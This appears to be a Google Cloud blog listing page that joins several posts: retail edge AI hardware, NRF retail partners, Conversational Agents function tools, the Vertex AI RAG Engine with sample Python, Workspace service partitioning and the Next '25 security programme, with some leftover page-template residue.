<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ea0c3d1cbe0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
How retailers can build an AI foundation
Retailers can find assets to fuel their AI in all corners of the business. You can unlock employee productivity by transforming your vast repository of handbooks, training materials, and operational procedures into working assets for AI.
Digitized manuals for store equipment, human resources, loss prevention, and domain-specific information can also be combined with agent-based AI assistants to provide contextually aware “next action assistants”. By extending AI optimized applications from the cloud to the edge, retail associates can now ask their AI assistant, “What do I do next?” with a detailed and fast response tailored to the retail associate’s question.
Edge processing power decision point: CPU vs GPU
Next, we’ll explore the critical decision on the right hardware to power your applications. The two primary options are CPUs (Central Processing Units) and GPUs (Graphics Processing Units), each with its own strengths and weaknesses. Making the informed choice requires understanding your specific use cases and balancing performance requirements, bandwidth, and model processing with cost considerations. Consider this chart to guide your decision-making process, especially when choosing between deploying at a regional DC or at the edge.
Decision matrix (chart):
Feature
CPU
GPU
Use cases (examples)
Cost
Lower
Higher
Basic analytics, people counting, simple object detection
Performance
Required; Good for general-purpose tasks
Optional; Good for parallel processing
Complex AI, video analytics, high-resolution image processing, ML model training
Power consumption
Lower
Higher
Remote locations, small form-factor devices
Latency
Moderate
Lower (for parallel tasks)
Real-time applications, immediate insights
Deployment location
Edge or Regional DC
Typically Edge, but feasible in Regional DC
Determined by latency, bandwidth, and data processing needs
Key decision criteria for retail decision makers
Complexity of AI models: Retail use case focused AI models, like basic object detection, can often run efficiently on CPUs. More complex models, such as those used for real-time video analytics or personalized recommendations with large datasets, typically require the parallel processing power of GPUs.
Data volume and velocity: If you’re processing large amounts of data at high speed, a GPU may be necessary to keep up with the demand. For smaller datasets and lower throughput, a CPU may suffice.
Latency requirements: For use cases requiring ultra-low latency, such as real-time fraud detection, GPUs can provide faster processing, especially when located at the edge, closer to the data source. However, network latency between the edge and a regional DC might negate this benefit if the GPU is located regionally.
Budget: GPUs usually have a higher price tag than CPUs. Carefully consider your budget and the potential ROI of investing in GPU-powered solutions before making a decision. Start with CPU-based solutions where possible and upgrade to GPUs only when absolutely necessary.
Power consumption: GPUs generally consume more power than CPUs. This is an important factor to consider for edge deployments, especially in locations with limited power availability. This is less of a concern if deploying at a regional DC where power and cooling are centralized.
Deployment location: The proximity of the processing power to the data source has major implications for latency. Deploying at the edge (in-store) minimizes latency for real-time use cases. Regional DCs introduce network latency, making them less suitable for applications requiring immediate action. However, certain tasks requiring heavy compute but not low latency (e.g., nightly inventory analysis) might be better suited for a regional DC where resources can be pooled and managed centrally.
Remember, not all AI and ML require new investments in emerging technology. Many AI/ML based use cases can produce the desired outcome without using a GPU. For example, consider visual inspection for storage analytics and fast check out referenced in the Google Distributed Cloud Price-a-Tray interactive game. The inference is performed at 5FPS, while the video stream continues to run at 25FPS. The bounding boxes are then drawn on top of the returned information rather than having one system perform the video stream, detection and bounding boxes. This enables more efficient use of the CPU since many of the actions in this example can be split across cores and threads.
But there are cases when GPUs do make sense. When very high precision is required, GPUs are often needed as the drop in fidelity to quantize a model may reduce the quality beyond acceptable thresholds. In the example of tracking an item, if millimeter movement accuracy is required, 5FPS would not be sufficient on a reasonably fast moving item and a GPU would likely be required.
There is a middle between GPUs and CPUs—the world of speciality accelerators. Accelerators come in the form of peripherals to a system or as special instruction sets to a CPU. CPUs are being manufactured with advanced matrix multiplication math assisting tensor manipulation on-chip, greatly improving performance of ML and AI models. One concrete example is running models compiled for OpenVINO. In addition, Google Distributed Cloud (GDC) Server and Rack editions utilize Intel Core processors, an architecture designed to be more flexible, supporting matrix math improving the performance of ML models on CPU over traditional ML model service serving.
Bring AI to your business
By tapping into the power of existing infrastructure and deploying AI at the edge, retailers can deliver modern customer experiences, streamline operations, and unlock employee productivity.
Google Cloud’s mission is to accelerate every organization’s ability to digitally transform its business and industry — and a key part of doing that is with our ISV and service partners, who possess critical industry knowledge and technical expertise. To provide customers with the most advanced ecosystem of solutions across industries, we’ve enabled these partners to easily build and scale products on our platform. Many are deeply engaged with our AI technology to deliver new and novel AI solutions directly to our customers and theirs.
Today, at the annual National Retail Federation (NRF) conference, we wanted to highlight more than 20 ISV and services partners that are utilizing Vertex AI, Gemini models, and other Google Cloud technologies to empower retail businesses with the tools they need to transform how employees work and shoppers engage with their brands.
At NRF, we’re excited to showcase the breadth of our ecosystem of retail partners and spotlight the ways they are enabling customer success using technology from Google Cloud.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e4e7b85be50>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Transforming marketing with AI-powered data
AI is helping retailers get significantly more value from business data, enabling them to create personalized campaigns at scale, increase ROI with data-driven insights, and build more predictive and advanced audience segments. Partners are using Vertex AI, Gemini models, and BigQuery to let customers unlock the true potential of their data to optimize revenue and more effectively grow their businesses.
Eagle Eye delivers itsAI-powered omnichannel personalization solution, built on Vertex AI, with built-for-retail algorithms to generate personalized promotions at scale that drive loyalty and customer engagement across channels.
LiveRamp provides a data collaboration platform that allows companies to enrich, activate, and analyze customer data while protecting brand and consumer trust
Revieve offers multiple solutions tailored for beauty retailers and brands that provide real-time consumer interactions, next gen AI, conversational AI, and data-informed product discovery.
Revionics’price optimization suite utilizes Gemini and Vertex AI to power conversational analytics that enable customers to engage with their retail data using natural language search, such as “which competitor changes prices most frequently” and “which products are priced higher than competitors.”
Optimizing unified commerce experiences
Unified commerce experiences equip retailers with a more holistic view of front- and back-end systems to have complete visibility of the customer, inventory, and orders across all retail channels. With Google Cloud technology like BigQuery and embedded ML, partners are helping customers enhance decision-making processes and create stronger brand loyalty and revenue growth.
BigCommerce uses Google Cloud AI within BigAI Product Recommendations, which enables brands to offer shoppers real-time, personalized recommendations and can boost conversion and average order value.
Bloomreach uniquely integrates customer and product data within its real-time AI solution, enabling more personalized marketing, product discovery, advertising content, and conversational shopping experiences.
commercetools isa global leader in composable commerce and empowers businesses to customize, scale, and optimize shopping experiences with solutions that help retailers reduce risks and costs, and expand growth through exceptional customer experiences.
Everseen Vision AI platform and applications reduce retail shrink, improve inventory accuracy, enhance customer service, and provide data-driven insights, contributing to retailers’ ROI and a streamlined shopping experience.
Quantum Metric provides a digital analytics platform that enables businesses to more easily monitor, troubleshoot, and optimize their customers’ digital journeys while leveraging gen AI to enhance user retention, conversion rates, and much more.
Shopify is the leading global commerce company with a platform engineered for speed, customization, reliability, and security for businesses of any size, and a better experience for consumers everywhere they shop.
Creating sustainable supply chains
AI-powered tools for supply chains and logistics are enabling retailers to drive more sustainable and efficient operations, scale automation, and reduce their carbon footprint across the entire value chain. Partners are leveraging Vertex AI and BigQuery to extend these capabilities to retailers, with industry-leading analytics and predictive capabilities that can help optimize business performance.
345 Global is a cloud-based platform that enables customers to optimize store planning, merchandising, sales, and marketing functions within a single, integrated solution.
Impact Analytics helps retailers and consumer goods businesses make better decisions and improve profitability with a platform that uses predictive analytics and machine learning to optimize various aspects, such as forecasting demand, managing supply chains, and enhancing merchandise planning, pricing, and promotions.
Manhattan empowers retailers to unify point of sale, order management, inventory, fulfillment, and customer service with supply chain execution — optimizing operations, enabling real-time decisions, and driving growth.
o9 Solutions unlocks measurable results by transforming disconnected planning processes, reducing value leakage, and enabling smarter, integrated, and more efficient planning decisions.
aside_block
<ListValue: [StructValue([(‘title’, ‘Our 2025 AI trends for retail and consumer goods’), (‘body’, <wagtail.rich_text.RichText object at 0x3e4e7b85ba00>), (‘btn_text’, ‘Read them now.’), (‘href’, ‘https://cloud.google.com/resources/ai-trends-retail?utm_source=cgc-blog&utm_medium=blog&utm_campaign=FY24-Q4-global-ENT30703-website-dl-ai-trends-report-retail-cpg-2025&utm_content=-&utm_term=-‘), (‘image’, None)])]>
Enhancing physical store operations
Physical stores and in-person shopping experiences remain vital to retailers. AI is helping these businesses improve how they operate in a variety of ways, whether it’s enhancing how merchandising assistants support customer requests or deploying machine vision to detect and resolve low-inventory challenges.
NCR Voyix enables retailers to deliver a seamless and personalized omnichannel shopping experience while providing real-time, data-driven insights into shopper behavior and store performance, which helps optimize operations and supports long-term growth.
Standard.ai offers solutions that let retailers optimize performance through computer vision with capabilities, such as multi-camera tracking to enable high-resolution understanding of shopper behaviors and store performance.
VusionGroup helps retailers maximize efficiency and improve store performance with solutions that can optimize critical functions, such as intelligent pricing and promotions, real-time shelf monitoring, in-store digital advertising, and more.
Zebraoffers new integrated hardware and software solutions that leverage AI and machine learning to help retailers transform workflows through improved inventory, connected frontline workers, and intelligent automation.
Enabling customer success with services partners
Google Cloud relies on its services partners to provide customers with the expertise and support needed to plan, deploy, and optimize AI projects. Many of these partners have launched services specifically for retailers and are continuing to demonstrate their proven ability to help customers transform with AI and other Google Cloud technology at NRF.
Accenture and its ai.RETAIL solution provide customers with the technology needed to transform operations, deploying AI and edge computing to improve consumer experiences, personalize marketing, enhance employee productivity, and more.
Deloitteoffers a real-time Associate Productivity solution for intelligent task management and improving in-store operations, a Demand Planning solution to enhance inventory productivity and on-shelf availability, and a Customer Data Enrichment solution for better customer insights and personalized marketing.
Publicis Sapient applies Google Cloud AI for its Content Supply Chain offering, which helps businesses optimize the content lifecycle, and its Retail Media Accelerator, which enables retailers to identify new revenue streams and increase ROI throughout the marketing lifecycle.
Tredence brings unified data models and AI/ML accelerators together with its gen AI-powered Category Performance Advisor, which provides real-time prescriptive recommendations for retail organizations to stay ahead of market trends, improve efficiency, and drive measurable growth.
Slalom provides retail businesses with a multimodal AI discovery solution that uses BigQuery, Vertex AI, and Gemini to help customers solve product discovery challenges and initiate automated workflows for delivery and warranty information.
If you have a website, it’s table stakes to build engaging experiences that are effective at retaining existing customers, and attracting new ones. Users want tailored content, but traditional website development tools struggle to keep up with the demand for dynamic, individualized journeys. With Google Gemini and Conversational Agents (Dialogflow CX), you can now build websites that dynamically adapt their content based on what your users are looking for.
In this blog post, you will learn how to:
Create dynamic web pages that respond to user’s intents using Conversational Agents
Use function tools to bridge the gap between conversation intent and web content display
What is a Conversational Agents function tool?
A Conversational Agent function tool is a feature that allows your chatbot to interact with external systems and trigger actions based on user conversations. In this article, we use it to:
Detect user intents from natural language input
Map those intents to specific function tool
Dynamically update the UI based on the conversation flow
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud developer tools’), (‘body’, <wagtail.rich_text.RichText object at 0x3ec89f16f610>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Let’s take an example: Retail chatbot
While everyone can benefit from these features, retailers in particular can benefit from building dynamic web pages with Conversational Agents. We’ll use a retail chatbot use case to demonstrate this tool. Here’s the workflow:
Step 1: Create a function tool
Set up a new Playbook function tool called Load-Swag-Content with the following input/output schemas in YAML format.
code_block
<ListValue: [StructValue([(‘code’, ‘# Input formatrnproperties:rn url:rn type: stringrn description: the URL for the Swagrnrequired:rn – urlrntype: objectrnrn# Output formatrnnull’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ec89cf41340>)])]>
Your console should look something like this:
Step 2: Set up a playbook steering agent
Set up a main steering playbook to call the function tool Load-Swag-Content.
Step 3: Create examples to drive Playbook agent behavior.
In this example, when a user asks about “Backpack”, the Playbook agent will call the function tool by passing a backpack related URL as an argument to the web client.
More information on the web client in the next step.
Step 4: Write web client JavaScript function
This client-side Javascript function receives the URL from the Load-Swag-Content function tool and updates the HTML iframe accordingly.
We are using HTML iframe to demonstrate the function calling and parameter passing capabilities. The same concept works across different web frameworks and applications, and developers can be as creative as they want to build custom logic.
Step 5: Register the function tool
Register the Playbook function tool using registerClientSideFunction, which will map the Load-Swag-Content tool with the JavaScript function loadURL.
This is a front end sample code. You need to update configuration such as YOUR_REGION, YOUR_PROJECT_ID, YOUR_AGENT_ID, YOUR_TOOL_ID, and custom JavaScript function.
Let’s look at a demo use case for a virtual swag assistant. The customer is greeted at the start of the chat.
When the customer wants to find out more about a Fleece Jacket, the page is dynamically updated to display relevant information.
Next steps
To learn more about Conversational Agent Function tools, check out the following resources and enhance your customer experience with real-time intent-based dynamic web pages.
Get started with Conversational Agent by following the tutorial here
Closing the gap between impressive model demos and real-world performance is crucial for successfully deploying generative AI for enterprise. Despite the incredible capabilities of generative AI for enterprise, this perceived gap may be a barrier for many developers and enterprises to “productionize” AI. This is where retrieval-augmented generation (RAG) becomes non-negotiable – it strengthens your enterprise applications by building trust in its AI outputs.
Today, we’re sharing the general availability of Vertex AI’s RAG Engine, a fully managed service that helps you build and deploy RAG implementations with your data and methods. With our Vertex AI RAG Engine you will be able to:
Adapt to any architecture: Choose the models, vector databases, and data sources that work best for your use case. This flexibility ensures RAG Engine fits into your existing infrastructure rather than forcing you to adapt to it.
Evolve with your use case: Add new data sources, updating models, or adjusting retrieval parameters happens through simple configuration changes. The system grows with you, maintaining consistency while accommodating new requirements.
Evaluate in simple steps: Set up multiple RAG engines with different configurations to find what works best for your use case.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3eef9c26ed30>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Introducing Vertex AI RAG Engine
Vertex AI RAG Engine is a managed service that lets you build and deploy RAG implementations with your data and methods. Think of it as having a team of experts who have already solved complex infrastructure challenges such as efficient vector storage, intelligent chunking, optimal retrieval strategies, and precise augmentation — all while giving you the controls to customize for your specific use case.
Vertex AI’s RAG Engine offers a vibrant ecosystem with a range of options catering to diverse needs.
DIY capabilities: DIY RAG empowers users to tailor their solutions by mixing and matching different components. It works great for low to medium complexity use cases with easy-to-get-started API, enabling fast experimentation, proof-of-concept and RAG-based application with a few clicks.
Search functionality: Vertex AI Search stands out as a robust, fully managed solution. It supports a wide variety of use cases, from simple to complex, with high out-of-the-box quality, easiness to get started and minimum maintenance.
Connectors: A rapidly growing list of connectors helps you quickly connect to various data sources, including Cloud Storage, Google Drive, Jira, Slack, or local files. RAG Engine handles the ingestion process (even for multiple sources) through an intuitive interface.
Enhanced performance and scalability: Vertex AI Search is designed to handle large volumes of data with exceptionally low latency. This translates to faster response times and improved performance for your RAG applications, especially when dealing with complex or extensive knowledge bases.
Simplified data management: Import your data from various sources, such as websites, BigQuery datasets, and Cloud Storage buckets, that can streamline your data ingestion process.
Improved LLM output quality: By using the retrieval capabilities of Vertex AI Search, you can help to ensure that your RAG application retrieves the most relevant information from your corpus, which leads to more accurate and informative LLM-generated outputs.
Customization
One of the defining strengths of Vertex AI’s RAG Engine is its capacity for customization. This flexibility allows you to fine-tune various components to perfectly align with your data and use case.
Parsing: When documents are ingested into an index, they are split into chunks. RAG Engine provides the possibility to tune chunk size and chunk overlap and different strategies to support different types of documents.
Retrieval: you might already be using Pinecone, or perhaps you prefer the open-source capabilities of Weaviate. Maybe you want to leverage Vertex AI Vector Search or our Vector database. RAG Engine works with your choice, or if you prefer, can manage the vector storage entirely for you. This flexibility ensures you’re never locked into a single approach as your needs evolve.
Generation: You can choose from hundreds of LLMs in Vertex AI Model Garden, including Google’s Gemini, Llama and Claude.
Use Vertex AI RAG as a tool in Gemini
Vertex AI’s RAG Engine is natively integrated with Gemini API as a tool. You can create grounded conversation that uses RAG to provide contextually relevant answers. Simply initialize a RAG retrieval tool, configured with specific settings like the number of documents to retrieve and using an LLM-based ranker. This tool is then passed to a Gemini model.
code_block
<ListValue: [StructValue([(‘code’, ‘from vertexai.preview import ragrnfrom vertexai.preview.generative_models import GenerativeModel, Toolrnimport vertexairnrnPROJECT_ID = “PROJECT_ID”rnCORPUS_NAME = “projects/{PROJECT_ID}/locations/LOCATION/ragCorpora/RAG_CORPUS_RESOURCE”rnMODEL_NAME= “MODEL_NAME”rnrn# Initialize Vertex AI API once per sessionrnvertexai.init(project=PROJECT_ID, location=”LOCATION”)rnrnconfig = vertexai.preview.rag.RagRetrievalConfig(rn top_k=10,rn ranking=rag.Ranking(rn llm_ranker=rag.LlmRanker(rn model_name=MODEL_NAMErn )rn )rn)rnrnrag_retrieval_tool = Tool.from_retrieval(rn retrieval=rag.Retrieval(rn source=rag.VertexRagStore(rn rag_resources=[rn rag.RagResource(rn rag_corpus=CORPUS_NAME,rn )rn ],rn rag_retrieval_config=configrn ),rn )rn)rnrnrag_model = GenerativeModel(rn model_name=MODEL_NAME, tools=[rag_retrieval_tool]rn)rnresponse = rag_model.generate_content(“Why is the sky blue?”)rnprint(response.text)rn# Example response:rn# The sky appears blue due to a phenomenon called Rayleigh scattering.rn# Sunlight, which contains all colors of the rainbow, is scatteredrn# by the tiny particles in the Earth’s atmosphere….rn# …’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eef9c26ed00>)])]>
Use Vertex AI Search as a retriever:
Vertex AI Search provides a solution for retrieving and managing data within your Vertex AI RAG applications. By using Vertex AI Search as your retrieval backend, you can improve performance, scalability, and ease of integration.
Enhanced performance and scalability: Vertex AI Search is designed to handle large volumes of data with exceptionally low latency. This translates to faster response times and improved performance for your RAG applications, especially when dealing with complex or extensive knowledge bases.
Simplified data management: Import your data from various sources, such as websites, BigQuery datasets, and Cloud Storage buckets, that can streamline your data ingestion process.
Seamless integration: Vertex AI provides built-in integration with Vertex AI Search, which lets you select Vertex AI Search as the corpus backend for your RAG application. This simplifies the integration process and helps to ensure optimal compatibility between components.
Improved LLM output quality: By using the retrieval capabilities of Vertex AI Search, you can help to ensure that your RAG application retrieves the most relevant information from your corpus, which leads to more accurate and informative LLM-generated outputs.
code_block
<ListValue: [StructValue([(‘code’, ‘from vertexai.preview import ragrnimport vertexairnrnPROJECT_ID = “PROJECT_ID”rnDISPLAY_NAME = “DISPLAY_NAME”rnENGINE_NAME = “ENGINE_NAME”rnrn# Initialize Vertex AI API once per sessionrnvertexai.init(project=PROJECT_ID, location=”us-central1″)rnrn# Create a corpusrnvertex_ai_search_config = rag.VertexAiSearchConfig(rn serving_config=f”{ENGINE_NAME}/servingConfigs/default_search”,rn)rnrnrag_corpus = rag.create_corpus(rn display_name=DISPLAY_NAME,rn vertex_ai_search_config=vertex_ai_search_config,rn)rnrn# Check the corpus just createdrnnew_corpus = rag.get_corpus(name=rag_corpus.name)rnprint(new_corpus)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eef9cad9ac0>)])]>
Cloud applications like Google Workspace provide benefits such as collaboration, availability, security, and cost-efficiency. However, for cloud application developers, there’s a fundamental conflict between achieving high availability and the constant evolution of cloud applications. Changes to the application, such as new code, configuration updates, or infrastructure rearrangements, can introduce bugs and lead to outages. These risks pose a challenge for developers, who must balance stability and innovation while minimizing disruption to users.
Here on the Google Workspace Site Reliability Engineering team, we once moved a replica of Google Docs to a new data center because we needed extra capacity. But moving the associated data, which was vast, overloaded a key index in our database, restricting user ability to create new docs. Thankfully, we were able to identify the root cause and mitigate the problem quickly. Still, this experience convinced us of the need to reduce the risk of a global outage from a simple application change.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3eef945c6ac0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Limit the blast radius
Our approach to reducing the risk of global outages is to limit the “blast radius,” or extent, of an outage by vertically partitioning the serving stack. The basic idea is to run isolated instances (“partitions”) of application servers and storage (Figure 1). Each partition contains all the various servers necessary to service a user request from end to end. Each production partition also has a pseudo-random mix of users and workloads, so all the partitions have similar resource needs. When it comes time to make changes to the application code, we deploy new changes to one partition at a time. Bad changes may cause a partition-wide outage, but we are protected from a global application outage.
Compare this approach to using canarying alone, in which new features or code changes are released to a small group of users before rolling them out to the rest. While canarying deploys changes first to just a few servers, it doesn’t prevent problems from spreading. For example, we’ve had incidents where canaried changes corrupted data used by all the servers in the deployment. With partitioning, the effects of bad changes are isolated to a single partition, preventing such contagion. Of course, in practice, we combine both techniques: canarying new changes to a few servers within a single partition.
Benefits of partitioning
Broadly speaking, partitioning brings a lot of advantages:
Availability: Initially, the primary motivation for partitioning was to improve the availability of our services and avoid global outages. In a global outage, an entire service may be down (e.g., users cannot log into Gmail), or a critical user journey (e.g., users cannot create Calendar events) — obviously things to be avoided.
Still, the reliability benefits of partitioning can be hard to quantify; global outages are relatively infrequent, so if you don’t have one for a while, it may be due to partitioning, or may be due to luck. That said, we’ve had several outages that were confined to a single partition, and believe they would have expanded into global outages without it.
Flexibility: We evaluate many changes to our systems by experimenting with data. Many user-facing experiments, such as a change to a UI element, use discrete groups of users. For example, in Gmail we can choose an on-disk layout that stores the message bodies of emails inline with the message metadata, or a layout that separates them into different disk files. The right decision depends on subtle aspects of the workload. For example, separating message metadata and bodies may reduce latency for some user interactions, but requires more compute resources in our backend servers to perform joins between the body and metadata columns. With partitioning, we can easily evaluate the impact of these choices in contained, isolated environments.
Data location: Google Workspace lets enterprise customers specify that their data be stored in a specific jurisdiction. In our previous, non-partitioned architecture, such guarantees were difficult to provide, especially since services were designed to be globally replicated to reduce latency and take advantage of available capacity.
Challenges
Despite the benefits, there are some challenges to adopt partitioning. In some cases, these challenges make it hard or risky to move from a non-partitioned to a partitioned setup. In other cases, challenges persist even after partitioning. Here are the issues as we see them:
Not all data models are easy to partition: For example, Google Chat needs to assign both users and chat rooms to partitions. Ideally, a chat and its members would be in a single partition to avoid cross-partition traffic. However, in practice, this is difficult to accomplish. Chat rooms and users form a graph, with users in many chat rooms and chat rooms containing many users. In the worst case, this graph may have only a single connected component — the user. If we were to slice the graph into partitions, we could not guarantee that all users would be in the same partition as their chat rooms.
Partitioning a live service requires care: Most of our services pre-date partitioning. As a result, adopting partitioning means taking a live service and changing its routing and storage setup. Even if the end goal is higher reliability, making these kinds of changes in a live system is often the source of outages, and can be risky.
Partition misalignment between services: Our services often communicate with each other. For example, if a new person is added to a Calendar event, Calendar servers make an Remote Procedure Call (RPC) to Gmail delivery servers to send the new invitee an email notification. Similarly, Calendar events with video call links require Calendar to talk to Meet servers for a meeting id. Ideally, we would get the benefits of partitioning even across services. However, aligning partitions between services is difficult. The main reason is that different services tend to use different entity types when determining which partition to use. For example, Calendar partitions on the owner of the calendar while Meet partitions on meeting id. The result is that there is no clear mapping from partitions in one service to another.
Partitions are smaller than the service: A modern cloud application is served by hundreds or thousands of servers. We run servers at less than full utilization so that we can tolerate spikes in traffic, and because servers that are saturated with traffic generally perform poorly. If we have 500 servers, and target each at 60% CPU utilization, we effectively have 200 spare servers to absorb load spikes. Because we do not fail over between partitions, each partition has access to a much smaller amount of spare capacity. In a non-partitioned setup, a few server crashes may likely go unnoticed, since there is enough headroom to absorb the lost capacity. But in a smaller partition, these crashes may account for a non-trivial portion of the available server capacity, and the remaining servers may become overloaded.
Key takeaways
We can improve the availability of web applications by partitioning their serving stacks. These partitions are isolated, because we do not fail over between them. Users and entities are assigned to partitions in a sticky manner to allow us to roll out changes in order of risk tolerance. This approach allows us to roll out changes one partition at a time with confidence that bad changes will only affect a single partition, and ideally that partition contains only users from your organization.
In short, partitioning supports our efforts to provide stronger and more reliable services to our users, and it might apply to your service as well. For example, you can improve the availability of your application by using Spanner, which provides geo-partitioning out of the box. Read more about geo-partitioning best practiceshere.
Few things are more critical to IT operations than security. Security incidents, coordinated threat actors, and regulatory mandates are coupled with the imperative to effectively manage risk and the vital business task of rolling out generative AI. That’s why in 2025 at Google Cloud Next we are creating an in-depth security experience to show you all the ways that you can make Google part of your security team and advance your innovation agenda with confidence.
Let’s see why Google Cloud Next is shaping up to be a must-attend event for security experts and the security-curious alike.
What’s in store for you
Here are some of the opportunities you’ll have to interact with Google’s security experts and security technology:
Our massive Security Lounge, a dedicated area of the expo where you can meet the security leaders engineering Google Cloud’s secure by design platform and products, and experience product demos spanning Google Cloud’s security portfolio. Get all your burning product questions answered and provide direct input to the teams who build them.
An interactive Security Operations Center to experience the power of Google Security Operations from the eyes of both defender and adversary. See first-hand how Google equips cybersecurity teams with the data, AI, and scalable analytics to detect and remediate today’s most sophisticated attacks.
At the Mandiant Threat Space, you’ll be able to hear and learn directly from frontline defenders and incident responders who battle advanced threats and defend critical infrastructure around the world.
The Securing AI experience demonstrates how Google Cloud products and expertise can help you manage AI risk, from creation to consumption: inventory your AI assets, safeguard your AI systems, and respond to threats.
Our Capture the Flag challenge, where you can test and hone your cybersecurity skills. This exercisewill use real-world data, including Cybersecurity and Infrastructure Security Agency (CISA) advisories, ransom notes, and information from the dark web, to simulate a real-world threat hunt. Navigate clues, analyze evidence, and solve puzzles to capture the flags and best the competition.
Security tabletop exercises where participants role-play and analyze aspects of a hypothetical but realistic cybersecurity incident, such as a data breach or ransomware attack. Gain insight into how your organization is likely to perform during incidents before they happen and learn best practices for handling these incredibly challenging situations that you can take back to your organization.
Birds of a Feather sessions for insightful discussions on key cloud security topics. These are unique opportunities to connect with peers, share your cybersecurity expertise and solve problems with the help of the Google Cloud Security community.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3eef9afcca00>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Security breakout sessions
If you’ve attended Next in the past, you know that breakouts are also core to our program. We’ll have more than 40 security breakout sessions covering today’s pressing security topics including cloud security and governance, frontline threat intelligence, enterprise compliance and resilience, AI risk management, and incident response.
Here’s a sneak peek at some of the key breakout sessions on the agenda:
Securing your AI deployments, from creation to consumption: Learn how to build secure AI systems from the ground up and protect your AI models from attacks.
Route, reduce, redact: Managing your security data pipeline:Dive into the new data pipeline management capabilities of Google SecOps and learn how to transform security data to manage scale, reduce costs, and satisfy compliance mandates.
Got identity? Learn to love IAM: Master Identity and Access Management (IAM) to control access to your cloud resources and prevent unauthorized access.
Stop data exfiltration with cloud-first security controls: Discover how to prevent sensitive data from leaving your organization’s control.
Unlocking OT security: Threat intelligence for critical industries: Learn how advanced threat intelligence enables organizations to move from reactive to proactive defense strategies.
AI security and APIs: Addressing the OWASP top 10 LLM and API risks: Understand the top security risks for large language models (LLMs) and APIs, and learn how to mitigate them.
Strengthen cloud security posture, detect threats, and mitigate risks with Security Command Center: Use Google Cloud’s Security Command Center to gain comprehensive visibility into your security posture and respond to threats effectively.
Best practices for SIEM migration and ditching dinosaurs: In this panel, experts will share insights and best practices from their own SIEM migration journeys.
Keep AI secrets safe with Confidential Computing: Explore confidential computing techniques to protect your sensitive data and AI models in use.
Protect Internet-facing web, API, and gen AI services from attacks: Secure your web applications, APIs, and generative AI services from a wide range of threats.
There’s no place like Chrome for advanced data protection and threat intelligence: Learn how Chrome’s security features can protect your users and your organization from cyberattacks.
Dedicated security executive program
Our CISO Connect for Leaders is dedicated programming designed to equip CISOs and other security leaders with insights and strategies they need to navigate the evolving threat landscape and build a security-first culture. If you would like to be considered for participation in this executive program at Next ‘25, contact your Google Cloud account representative.
Don’t miss out
Next ‘25 is the ideal opportunity for everyone in your organization to learn about how Google Cloud can help keep them safe as they move forward in the AI era. You can also earn continuing professional education credits for your certifications.
Next ’25 will take place at the Mandalay Bay Convention Center in Las Vegas, April 9 to 11, 2025. Early bird pricing is available for $999 — but space is limited, so register soon.
Elevate your security game at Next ’25. Register today, and stay tuned for more updates and information on our security programming.
Retailers have always moved quickly to connect and match the latest merchandise with customers’ needs. And the same way they carefully design every inch of their stores, the time and thought that goes into their IT infrastructure is now just as important in the era of omnichannel shopping.
As retail organizations increasingly adopt AI foundation models and other AI technologies to improve the shopping journey, robust infrastructure becomes paramount. Retailers need to be able to develop AI applications and services quickly, reliably, robustly, and affordably, and with support from Google Cloud and NVIDIA, leading companies are already accelerating their time to market and achieving scalable costs as they move AI from pilots into production.
Google Cloud has worked with NVIDIA to empower retailers to boost their customer engagements in exciting new ways, deliver more hyper-personalized recommendations, and build their own AI applications and agents; we’ve also integrated prebuilt generative AI agents for customer service to drive immediate savings. With the NVIDIA AI Enterprise software platform available on the Google Cloud Marketplace, retailers can streamline AI development and deployment through scalable NVIDIA infrastructure running on Google Cloud.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ec644279490>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
And now, retailers can also leverage NVIDIA NIM microservices, part of NVIDIA AI Enterprise and available on Google Kubernetes Engine (GKE) to deploy generative AI models at scale, optimize inference and handle large volumes of inquiries at reduced costs.
Retail customers and partners are combining Google Cloud with NVIDIA AI Enterprise to unlock AI transformation at scale.
Reduce Costs and Enhance Customer Satisfaction: LiveX AI stands at the cutting edge of generative AI technology, building custom, multimodal AI agents that can deliver truly human-like customer experiences. Google Cloud and LiveX AI collaborated to help jumpstart LiveX AI’s development, using Google Kubernetes Engine (GKE) and NVIDIA AI Enterprise. In a matter of three weeks, LiveX AI and Google Cloud worked together to deliver a custom solution for its client, resulting in a reduction in customer support costs by up to 85%.
